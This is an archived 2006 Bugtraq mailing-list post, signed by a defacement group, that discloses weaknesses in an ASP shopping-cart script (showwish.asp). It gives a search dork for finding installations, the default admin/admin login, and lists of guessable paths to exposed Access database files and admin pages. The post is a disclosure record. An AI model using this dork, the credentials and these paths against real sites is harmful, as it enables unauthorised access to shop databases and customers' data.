lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060607063157.18922.qmail@securityfocus.com>
Date: 7 Jun 2006 06:31:57 -0000
From: ip.chat@...oo.com
To: bugtraq@...urityfocus.com
Subject: bug on showwich.asp


################ Azhteam Digital Security Team #################
#
# showwish.asp
# 
# Find by Soltan_defacer
# Greetings; s.defacer - azhteam - lvl3hr
# 
# 
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: soltan_defacer@...xxxxxx   or   http://www.azhteam.com
#
##################################################################



Dork: inurl:/showwish.asp

USER default: admin
PASS default: admin


Example:

www.site.com/showwish.asp


Urls xpl:
www.site.com/category.asp
www.site.com/config.asp
www.site.com/myorders.asp
www.site.com/payment.asp
www.site.com/signout.asp
www.site.com/tracker.asp
www.site.com/addprod.asp
www.site.com/alter.asp
www.site.com/signin.asp
www.site.com/process.asp



Urls xpl:
www.site.com/acart.mdb
www.site.com/acart2.mdb
www.site.com/acart20.mdb
www.site.com/acart2_0.mdb
www.site.com/admin/acart.mdb
www.site.com/admin/acart2.mdb
www.site.com/admin/acart20.mdb
www.site.com/admin/acart2_0.mdb
www.site.com/fpdb/acart.mdb
www.si e.com/fpdb/acart2.mdb
www.site.com/fpdb/acart20.mdb
www.site.com/fpdb/acart2_0.mdb

---------------------------------------------------------

Example:
www.site.com/admin/index.asp
www.site.com/admin/default.asp


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ